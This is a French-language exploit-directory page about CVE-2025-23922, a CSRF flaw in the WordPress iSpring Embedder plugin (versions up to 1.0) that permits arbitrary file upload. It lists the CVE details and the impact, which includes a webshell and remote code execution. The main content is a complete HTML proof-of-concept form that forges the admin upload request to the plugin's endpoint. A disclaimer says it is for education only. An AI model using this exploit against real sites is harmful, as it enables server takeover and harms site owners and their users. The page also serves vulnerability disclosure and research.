Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-23922 — Plugin WordPress iSpring Embedder <= 1.0 - Vulnérabilité CSRF menant à un téléchargement arbitraire de fichiers | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-23922
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubnxploited/cve-2025-23922

CVE-2025-23922

Plugin WordPress iSpring Embedder <= 1.0 - Vulnérabilité CSRF menant à un téléchargement arbitraire de fichiers

Voir le dépôt
21il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-23922 - WordPress iSpring Embedder CSRF vers téléchargement de fichier arbitraire

📌 Détails CVE

  • CVE ID: CVE-2025-23922
  • Publié : 2025-01-16
  • Plugin concerné : WordPress iSpring Embedder plugin
  • Versions affectées : <= 1.0
  • Auteur du plugin : Harsh
  • Type de vulnérabilité : Cross-Site Request Forgery (CSRF) → téléchargement de fichier arbitraire
  • CWE ID : CWE-352 : Cross-Site Request Forgery (CSRF)
  • Score CVSS : 10.0 (Critique)
  • Vector : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

🔥 Description

Une vulnérabilité CSRF dans le plugin WordPress iSpring Embedder permet à un attaquant distant non authentifié d'amener un administrateur authentifié à télécharger des fichiers arbitraires (tels qu'un webshell PHP) sur le serveur.

Le point d'accès vulnérable n'implémente aucune protection CSRF, et la fonctionnalité de téléchargement de fichiers accepte les fichiers .zip, qui sont extraits à l'emplacement suivant :

root@kitploit:~
/wp-content/uploads/iSpring_embedder/

💡 Impact

Un attaquant peut :

  • Déclencher des téléchargements de fichiers sans authentification.
  • Obtenir une exécution de code à distance (RCE) en téléchargeant un fichier PHP malveillant dans une archive ZIP.
  • Compromettre l'ensemble du serveur web en chaînant cette attaque avec un webshell conçu.

🚀 Preuve de concept (PoC) Exploit (HTML)

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>CSRF File Upload Exploit</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f4f4f4;
      padding: 20px;
    }
    .container {
      background: #fff;
      padding: 25px;
      border-radius: 10px;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
      max-width: 600px;
      margin: auto;
    }
    h1 {
      color: #d9534f;
    }
    input[type="file"],
    input[type="submit"] {
      margin-top: 10px;
      padding: 10px;
      font-size: 16px;
    }
    .footer {
      margin-top: 30px;
      font-size: 14px;
      color: #777;
      text-align: center;
    }
  </style>
</head>
<body>
  <div class="container">
    <h1>CSRF Exploit – File Upload</h1>

    <p>
      This is a proof-of-concept (PoC) exploit for the following vulnerability:
    </p>
    <ul>
      <li><strong>Vulnerability:</strong> CSRF leading to Arbitrary File Upload</li>
      <li><strong>Plugin:</strong> iSpring Embedder for WordPress (<= v1.0)</li>
      <li><strong>CVE:</strong> CVE-2025-23922</li>
      <li><strong>Impact:</strong> Remote attackers can coerce an authenticated administrator to upload arbitrary files, potentially including web shells.</li>
      <li><strong>Upload Path:</strong> <code>/wp-content/uploads/iSpring_embedder/</code></li>
    </ul>

    <form id="csrfForm" action="http://wordpresssite/wp-admin/admin.php?page=ispring-embedder" method="POST" enctype="multipart/form-data">
      <label><strong>Select ZIP file to upload:</strong></label><br>
      <input type="file" name="zip_file" required><br>
      <input type="hidden" name="file_name" value="exploit_csrf">
      <input type="submit" name="submit_ispring_form" value="Upload File via CSRF">
    </form>

    <div class="footer">
      <p>
        Exploit for <strong>CSRF to Arbitrary File Upload vulnerability</strong><br>
        <strong>CVE-2025-23922</strong><br>
        Developed by <strong>Nxploit | Khaled Alenazi</strong>
      </p>
    </div>
  </div>
</body>
</html>



⚠️ Avertissement

Cette preuve de concept est fournie uniquement à des fins éducatives et de recherche.
L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par cet exploit.

Nxploit | Khaled Alenazi
Chercheur en sécurité & Développeur d'exploits
https://github.com/Nxploit

Télécharger l’outil